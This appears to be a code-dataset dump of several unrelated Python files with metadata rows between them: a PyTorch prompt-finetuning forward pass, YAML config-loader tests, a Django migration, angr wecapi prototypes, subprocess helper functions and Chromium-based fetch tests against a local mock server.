    ):
        """Prompt-finetuning forward pass.

        ``fwd_type``: 2 -> encode from precomputed embeddings; 1 -> return
        word embeddings only; 0 -> normal path. Returns ``(loss, logits)``
        when labels are given, else ``(logits,)``.
        """
        if fwd_type == 2:
            assert inputs_embeds is not None
            return self.encode(input_ids=input_ids, attention_mask=attention_mask, mask_pos=mask_pos, inputs_embeds=inputs_embeds)
        elif fwd_type == 1:
            return self.embed_encode(input_ids)

        logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                # Regression: scale labels into [0, 1] and compare the
                # two-way (low, high) distribution with KL.
                loss_fct = nn.KLDivLoss(log_target=True)
                labels = torch.stack([1 - (labels.view(-1) - self.lb) / (self.ub - self.lb), (labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
                loss = loss_fct(logits.view(-1, 2), labels)
            else:
                if labels.shape == logits.shape:
                    # Soft labels: KL divergence against the given distribution.
                    loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
                                    labels, reduction='batchmean')
                else:
                    loss_fct = nn.CrossEntropyLoss()
                    loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))
                    if self.model_args.hybrid == 1:
                        # NOTE(review): `cls_logits` is never defined in this
                        # method and this class's encode() returns only the
                        # label-word logits, so this branch would raise
                        # NameError — confirm before enabling hybrid here.
                        cls_loss = loss_fct(cls_logits.view(-1, cls_logits.size(-1)), labels.view(-1))
                        loss = loss + cls_loss

        output = (logits,)
        if self.num_labels == 1:
            # Regression output: map log-prob of the "high" polarity back
            # to the original [lb, ub] range.
            output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)
        return ((loss,) + output) if loss is not None else output
| 36.339862
| 169
| 0.606188
| 7,456
| 63,086
| 4.85287
| 0.051368
| 0.02609
| 0.035818
| 0.0296
| 0.857889
| 0.83191
| 0.814195
| 0.791864
| 0.785839
| 0.763066
| 0
| 0.008665
| 0.304838
| 63,086
| 1,735
| 170
| 36.360807
| 0.816395
| 0.119535
| 0
| 0.785908
| 0
| 0
| 0.014231
| 0.002788
| 0
| 0
| 0
| 0
| 0.004517
| 1
| 0.046974
| false
| 0
| 0.020777
| 0
| 0.135501
| 0.00271
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa224583108dc0e039048a5143c9e3b023f68ad3
| 2,116
|
py
|
Python
|
tests/small/config_test.py
|
noriyukipy/smilechat
|
a9c0ef93c35b2a1f3e9d1700391ae865544adfbc
|
[
"MIT"
] | 5
|
2021-01-01T12:34:23.000Z
|
2022-03-08T13:02:11.000Z
|
tests/small/config_test.py
|
noriyukipy/smilechat
|
a9c0ef93c35b2a1f3e9d1700391ae865544adfbc
|
[
"MIT"
] | null | null | null |
tests/small/config_test.py
|
noriyukipy/smilechat
|
a9c0ef93c35b2a1f3e9d1700391ae865544adfbc
|
[
"MIT"
] | 2
|
2020-09-20T10:41:51.000Z
|
2020-11-09T06:15:32.000Z
|
import tempfile
import os
from msgflow.config import load_yaml
def write(fp, content):
    """Write *content* through the open file object *fp*, flushing so a
    reader opening the file by name immediately sees the data."""
    fp.write(content)
    fp.flush()
def test_load_yaml():
    """load_yaml parses a plain YAML file into the expected nested dict."""
    yaml_str = """
service:
  name: msgflow.service.CliService
  config:
    user_name: you
"""
    want = {
        "service": {
            "name": "msgflow.service.CliService",
            "config": {"user_name": "you"},
        }
    }
    # NamedTemporaryFile gives the file a path load_yaml can open by name.
    with tempfile.NamedTemporaryFile(mode="w+") as fp:
        write(fp, yaml_str)
        # Load and test config
        got = load_yaml(fp.name)
        assert got == want
def test_load_yaml_parse_with_env_var():
    """load_yaml expands ${VAR} placeholders from the environment."""
    yaml_str = """
service:
  name: msgflow.service.CliService
  config:
    user_name: ${USER_NAME}
    password: ${PASSWORD}
"""
    # Set environment variables the placeholders should resolve to.
    os.environ["USER_NAME"] = "name_from_env"
    os.environ["PASSWORD"] = "password_from_env"

    want = {
        "service": {
            "name": "msgflow.service.CliService",
            "config": {"user_name": "name_from_env", "password": "password_from_env"},
        }
    }
    try:
        with tempfile.NamedTemporaryFile(mode="w+") as fp:
            write(fp, yaml_str)
            # Load and test config
            got = load_yaml(fp.name)
            assert got == want
    finally:
        # Robustness fix: remove the environment variables even when the
        # assertion fails, so leaked state cannot affect other tests.
        del os.environ["USER_NAME"]
        del os.environ["PASSWORD"]
def test_load_yaml_parse_with_env_var_but_not_defined():
    """An undefined ${VAR} placeholder is left verbatim in the result."""
    yaml_str = """
service:
  name: msgflow.service.CliService
  config:
    user_name: ${USER_NAME}
    password: ${PASSWORD}
"""
    # Only USER_NAME is defined; PASSWORD is deliberately left unset so the
    # placeholder must pass through untouched.
    os.environ["USER_NAME"] = "name_from_env"

    want = {
        "service": {
            "name": "msgflow.service.CliService",
            "config": {"user_name": "name_from_env", "password": "${PASSWORD}"},
        }
    }
    try:
        with tempfile.NamedTemporaryFile(mode="w+") as fp:
            write(fp, yaml_str)
            # Load and test config
            got = load_yaml(fp.name)
            assert got == want
    finally:
        # Robustness fix: clean up even when the assertion fails, so the
        # leaked USER_NAME cannot affect other tests.
        del os.environ["USER_NAME"]
| 23
| 86
| 0.600662
| 247
| 2,116
| 4.931174
| 0.178138
| 0.078818
| 0.08867
| 0.123153
| 0.848112
| 0.815271
| 0.815271
| 0.815271
| 0.76601
| 0.71757
| 0
| 0
| 0.268904
| 2,116
| 91
| 87
| 23.252747
| 0.78733
| 0.113894
| 0
| 0.676923
| 0
| 0
| 0.339946
| 0.083646
| 0
| 0
| 0
| 0
| 0.046154
| 1
| 0.061538
| false
| 0.092308
| 0.046154
| 0
| 0.107692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
d736e8ee7405b1bf28bd21cb9ca9faf341badb53
| 1,207
|
py
|
Python
|
xojbackend/app/core/migrations/0002_auto_20210208_1641.py
|
mazharkafi004/XOJ
|
834091418a7c4d008e44c3ff49df5955f38d9378
|
[
"MIT"
] | null | null | null |
xojbackend/app/core/migrations/0002_auto_20210208_1641.py
|
mazharkafi004/XOJ
|
834091418a7c4d008e44c3ff49df5955f38d9378
|
[
"MIT"
] | null | null | null |
xojbackend/app/core/migrations/0002_auto_20210208_1641.py
|
mazharkafi004/XOJ
|
834091418a7c4d008e44c3ff49df5955f38d9378
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.6 on 2021-02-08 16:41
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add per-judge credential columns (handle/password pairs) to User."""

    dependencies = [
        ('core', '0001_initial'),
    ]

    # All six new columns are identical optional CharFields, so the
    # AddField operations are generated from the column names.
    operations = [
        migrations.AddField(
            model_name='user',
            name=column,
            field=models.CharField(blank=True, max_length=255),
        )
        for column in (
            'cf_handle', 'cf_pass',
            'uri_handle', 'uri_pass',
            'uva_handle', 'uva_pass',
        )
    ]
| 27.431818
| 63
| 0.545982
| 123
| 1,207
| 5.203252
| 0.325203
| 0.16875
| 0.215625
| 0.253125
| 0.784375
| 0.784375
| 0.784375
| 0.723438
| 0.723438
| 0.653125
| 0
| 0.045963
| 0.333057
| 1,207
| 43
| 64
| 28.069767
| 0.749068
| 0.037283
| 0
| 0.648649
| 1
| 0
| 0.07931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.081081
| 0.027027
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
ad1aa133ec45dd3a43990cc17ec13ed179e4802f
| 10,469
|
py
|
Python
|
angr/procedures/definitions/win32_wecapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_wecapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_wecapi.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
# SimLibrary definition for the Windows Event Collector API (wecapi.dll).
# This module only declares function prototypes (types + argument names) so
# that angr can type calls into the DLL; no SimProcedure implementations are
# registered here.
# NOTE(review): this file looks machine-generated (uniform one-line entries,
# empty '#' separators) -- prefer fixing the generator over hand-editing.
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
# wecapi.dll exports use stdcall on 32-bit x86 and the Microsoft calling
# convention on AMD64.
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("wecapi.dll")
# Mapping of exported function name -> SimTypeFunction prototype.
prototypes = \
    {
        #
        'EcOpenSubscriptionEnum': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["Flags"]),
        #
        'EcEnumNextSubscription': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["SubscriptionEnum", "SubscriptionNameBufferSize", "SubscriptionNameBuffer", "SubscriptionNameBufferUsed"]),
        #
        'EcOpenSubscription': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["SubscriptionName", "AccessMask", "Flags"]),
        #
        'EcSetSubscriptionProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_PROPERTY_ID"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Subscription", "PropertyId", "Flags", "PropertyValue"]),
        #
        'EcGetSubscriptionProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_PROPERTY_ID"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Subscription", "PropertyId", "Flags", "PropertyValueBufferSize", "PropertyValueBuffer", "PropertyValueBufferUsed"]),
        #
        'EcSaveSubscription': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["Subscription", "Flags"]),
        #
        'EcDeleteSubscription': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["SubscriptionName", "Flags"]),
        #
        'EcGetObjectArraySize': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "ObjectArraySize"]),
        #
        'EcSetObjectArrayProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_PROPERTY_ID"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "PropertyId", "ArrayIndex", "Flags", "PropertyValue"]),
        #
        'EcGetObjectArrayProperty': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_PROPERTY_ID"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "PropertyId", "ArrayIndex", "Flags", "PropertyValueBufferSize", "PropertyValueBuffer", "PropertyValueBufferUsed"]),
        #
        'EcInsertObjectArrayElement': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "ArrayIndex"]),
        #
        'EcRemoveObjectArrayElement': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["ObjectArray", "ArrayIndex"]),
        #
        'EcGetSubscriptionRunTimeStatus': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="EC_SUBSCRIPTION_RUNTIME_STATUS_INFO_ID"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Anonymous": SimUnion({"BooleanVal": SimTypeInt(signed=True, label="Int32"), "UInt32Val": SimTypeInt(signed=False, label="UInt32"), "DateTimeVal": SimTypeLongLong(signed=False, label="UInt64"), "StringVal": SimTypePointer(SimTypeChar(label="Char"), offset=0), "BinaryVal": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "BooleanArr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "Int32Arr": SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), "StringArr": SimTypePointer(SimTypePointer(SimTypeChar(label="Char"), offset=0), offset=0), "PropertyHandleVal": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="<anon>", label="None"), "Count": SimTypeInt(signed=False, label="UInt32"), "Type": SimTypeInt(signed=False, label="UInt32")}, name="EC_VARIANT", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["SubscriptionName", "StatusInfoId", "EventSourceName", "Flags", "StatusValueBufferSize", "StatusValueBuffer", "StatusValueBufferUsed"]),
        #
        'EcRetrySubscription': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["SubscriptionName", "EventSourceName", "Flags"]),
        #
        'EcClose': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Object"]),
    }
lib.set_prototypes(prototypes)
| 201.326923
| 1,470
| 0.740854
| 1,087
| 10,469
| 7.087397
| 0.110396
| 0.184839
| 0.101765
| 0.146028
| 0.82866
| 0.82866
| 0.826843
| 0.819574
| 0.814123
| 0.811267
| 0
| 0.024438
| 0.077562
| 10,469
| 51
| 1,471
| 205.27451
| 0.773325
| 0.002675
| 0
| 0
| 0
| 0
| 0.235854
| 0.055529
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.172414
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ad437a4bd92339f8ed6ec631d91c1435c5056312
| 1,677
|
py
|
Python
|
spikesorters/sorter_tools.py
|
Shawn-Guo-CN/spikesorters
|
e67831289bfefb356c3fd8e5700934fdeaf2b894
|
[
"MIT"
] | null | null | null |
spikesorters/sorter_tools.py
|
Shawn-Guo-CN/spikesorters
|
e67831289bfefb356c3fd8e5700934fdeaf2b894
|
[
"MIT"
] | null | null | null |
spikesorters/sorter_tools.py
|
Shawn-Guo-CN/spikesorters
|
e67831289bfefb356c3fd8e5700934fdeaf2b894
|
[
"MIT"
] | null | null | null |
"""
Some utils function to run command.
"""
import shlex
import sys
from subprocess import PIPE, CalledProcessError, Popen, call, check_call
def _run_command_and_print_output(command):
    """Tokenize *command*, run it, echo its output, and return the exit code.

    The command string is split with shlex (POSIX quoting rules everywhere
    except Windows) and executed without a shell.  stdout and stderr are
    drained one line at a time and printed until the child has exited and
    both streams are exhausted.
    """
    argv = shlex.split(command, posix="win" not in sys.platform)
    with Popen(argv, stdout=PIPE, stderr=PIPE) as child:
        while True:
            out_line = child.stdout.readline()
            err_line = child.stderr.readline()
            # Stop only once the process is gone AND both pipes are drained.
            if not out_line and not err_line and child.poll() is not None:
                break
            if out_line:
                print(out_line.decode())
            if err_line:
                print(err_line.decode())
        return child.poll()
def _run_command_and_print_output_split(command_list):
    """Run *command_list* (an argv list), echo its output, return the exit code.

    Same contract as _run_command_and_print_output, but the caller supplies
    a pre-tokenized argument list instead of a command string.
    """
    with Popen(command_list, stdout=PIPE, stderr=PIPE) as child:
        while True:
            out_line = child.stdout.readline()
            err_line = child.stderr.readline()
            # Stop only once the process is gone AND both pipes are drained.
            if not out_line and not err_line and child.poll() is not None:
                break
            if out_line:
                print(out_line.decode())
            if err_line:
                print(err_line.decode())
        return child.poll()
def _call_command(command):
    """Run *command* (a shell-style string) synchronously, raising on failure.

    The string is tokenized with shlex (POSIX quoting rules everywhere
    except Windows) and executed without a shell.  Raises Exception if the
    command exits with a non-zero status.

    Fix: the original called subprocess.call(), which returns the exit code
    and NEVER raises CalledProcessError, so the except clause was dead code
    and failures were silently ignored.  check_call() raises on non-zero
    exit, matching the handler's evident intent.
    """
    command_list = shlex.split(command, posix="win" not in sys.platform)
    try:
        check_call(command_list)
    except CalledProcessError as e:
        # Re-raise as a generic Exception, keeping the original as cause.
        raise Exception(e.output) from e
def _call_command_split(command_list):
    """Run *command_list* (an argv list) synchronously, raising on failure.

    Raises Exception if the command exits with a non-zero status.

    Fix: the original called subprocess.call(), which returns the exit code
    and NEVER raises CalledProcessError, so the except clause was dead code
    and failures were silently ignored.  check_call() raises on non-zero
    exit, matching the handler's evident intent.
    """
    try:
        check_call(command_list)
    except CalledProcessError as e:
        # Re-raise as a generic Exception, keeping the original as cause.
        raise Exception(e.output) from e
| 31.641509
| 92
| 0.636852
| 201
| 1,677
| 5.114428
| 0.233831
| 0.085603
| 0.025292
| 0.031128
| 0.847276
| 0.847276
| 0.797665
| 0.797665
| 0.797665
| 0.797665
| 0
| 0
| 0.278473
| 1,677
| 52
| 93
| 32.25
| 0.849587
| 0.020871
| 0
| 0.829268
| 0
| 0
| 0.003672
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.073171
| 0
| 0.219512
| 0.146341
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad8bae8d4649d4b2f018e1e2569e143bcd7f2599
| 15,655
|
py
|
Python
|
tests/test_chromium.py
|
fake-name/WebRequest
|
3d24b98296791055d629103ddb8a7e7d35dda9fb
|
[
"WTFPL"
] | 8
|
2018-06-04T09:34:28.000Z
|
2021-09-16T15:21:24.000Z
|
tests/test_chromium.py
|
fake-name/WebRequest
|
3d24b98296791055d629103ddb8a7e7d35dda9fb
|
[
"WTFPL"
] | 4
|
2018-03-03T07:45:27.000Z
|
2019-12-26T20:38:18.000Z
|
tests/test_chromium.py
|
fake-name/WebRequest
|
3d24b98296791055d629103ddb8a7e7d35dda9fb
|
[
"WTFPL"
] | 1
|
2019-12-26T20:36:32.000Z
|
2019-12-26T20:36:32.000Z
|
import unittest
import socket
import json
import base64
import zlib
import gzip
import bs4
import ChromeController
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import WebRequest
from . import testing_server
class TestChromium(unittest.TestCase):
    """Integration tests for WebGetRobust's Chromium-backed fetch helpers.

    Every test talks to a local mock HTTP server started by
    ``testing_server.start_server``; the expected payloads ('Root OK?',
    the binary blob, redirect targets, titles) are defined by that module.
    NOTE(review): requires a working local Chromium install -- these are
    integration tests, not unit tests.
    """
    def setUp(self):
        # Fresh fetcher per test; the mock server is bound to it.
        self.wg = WebRequest.WebGetRobust()
        # Configure mock server.
        self.mock_server_port, self.mock_server, self.mock_server_thread = testing_server.start_server(self, self.wg, is_chromium=True)
    def tearDown(self):
        # Stop the mock server, then drop the fetcher.
        self.mock_server.shutdown()
        # Hacky force-close of the chromium interface
        # self.wg.close_chromium()
        del self.wg
    def test_fetch_1(self):
        # Baseline: plain (non-chromium) fetch of the server root.
        page = self.wg.getpage("http://localhost:{}".format(self.mock_server_port))
        self.assertEqual(page, 'Root OK?')
    def test_fetch_chromium_1(self):
        # Chromium fetch of the root: empty filename, HTML mimetype.
        page, fname, mtype = self.wg.getItemChromium("http://localhost:{}".format(self.mock_server_port))
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, 'Root OK?')
    def test_fetch_chromium_2(self):
        # Plain-text resource: filename taken from the URL path segment.
        page, fname, mtype = self.wg.getItemChromium("http://localhost:{}/raw-txt".format(self.mock_server_port))
        self.assertEqual(fname, 'raw-txt')
        self.assertEqual(mtype, 'text/plain')
        self.assertEqual(page, 'Root OK?')
    def test_fetch_chromium_3(self):
        # Binary content must come back as undecoded bytes.
        page, fname, mtype = self.wg.getItemChromium("http://localhost:{}/binary_ctnt".format(self.mock_server_port))
        self.assertEqual(fname, 'binary_ctnt')
        self.assertEqual(mtype, 'image/jpeg')
        self.assertEqual(page, b"Binary!\x00\x01\x02\x03")
    def test_fetch_chromium_4(self):
        # Rendered fetch: Chromium wraps the payload in a full HTML skeleton.
        page, fname, mtype = self.wg.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port))
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
    def test_fetch_chromium_5(self):
        # Same as _4, but exercising the title_timeout parameter.
        page, fname, mtype = self.wg.chromiumGetRenderedItem("http://localhost:{}".format(self.mock_server_port), title_timeout=20)
        self.assertEqual(fname, '')
        self.assertEqual(mtype, 'text/html')
        self.assertEqual(page, '<html><head></head><body>Root OK?</body></html>') # Chrome adds a basic body here
    def test_head_chromium_1(self):
        # HEAD of a non-redirecting URL resolves to the URL itself.
        url_1 = "http://localhost:{}/raw-txt".format(self.mock_server_port)
        purl_1 = self.wg.getHeadChromium(url_1)
        self.assertEqual(purl_1, url_1)
    def test_head_chromium_2(self):
        # HEAD follows the redirect and reports the destination URL.
        url_2 = "http://localhost:{}/redirect/to-1".format(self.mock_server_port)
        purl_2 = self.wg.getHeadChromium("http://localhost:{}/redirect/from-1".format(self.mock_server_port))
        self.assertEqual(purl_2, url_2)
    def test_head_chromium_3(self):
        # A bad redirect resolves back to the requested URL.
        url_3 = "http://localhost:{}/redirect/bad-1".format(self.mock_server_port)
        purl_3 = self.wg.getHeadChromium("http://localhost:{}/redirect/bad-1".format(self.mock_server_port))
        self.assertEqual(purl_3, url_3)
    def test_head_title_chromium_1(self):
        # Page with a <title>: the title is returned verbatim.
        pg_url = "http://localhost:{}/content/have-title".format(self.mock_server_port)
        retreived = self.wg.getHeadTitleChromium(pg_url)
        expect = {
            'url': pg_url,
            'title': 'I can haz title?',
        }
        self.assertEqual(retreived, expect)
    def test_head_title_chromium_2(self):
        pg_url = "http://localhost:{}/".format(self.mock_server_port)
        retreived = self.wg.getHeadTitleChromium(pg_url)
        expect = {
            # If no title is specified, chromium returns the server URL
            'url': pg_url,
            'title': 'localhost:{}'.format(self.mock_server_port),
        }
        self.assertEqual(retreived, expect)
    def test_head_title_chromium_3(self):
        pg_url = "http://localhost:{}/binary_ctnt".format(self.mock_server_port)
        retreived = self.wg.getHeadTitleChromium(pg_url)
        expect = {
            # If no title is specified, chromium returns the server URL
            'url': pg_url,
            'title': 'localhost:{}/binary_ctnt'.format(self.mock_server_port),
        }
        self.assertEqual(retreived, expect)
    def test_head_title_chromium_4(self):
        pg_url = "http://localhost:{}/content/no-title".format(self.mock_server_port)
        retreived = self.wg.getHeadTitleChromium(pg_url)
        expect = {
            'url': pg_url,
            'title': "localhost:{}/content/no-title".format(self.mock_server_port),
        }
        self.assertEqual(retreived, expect)
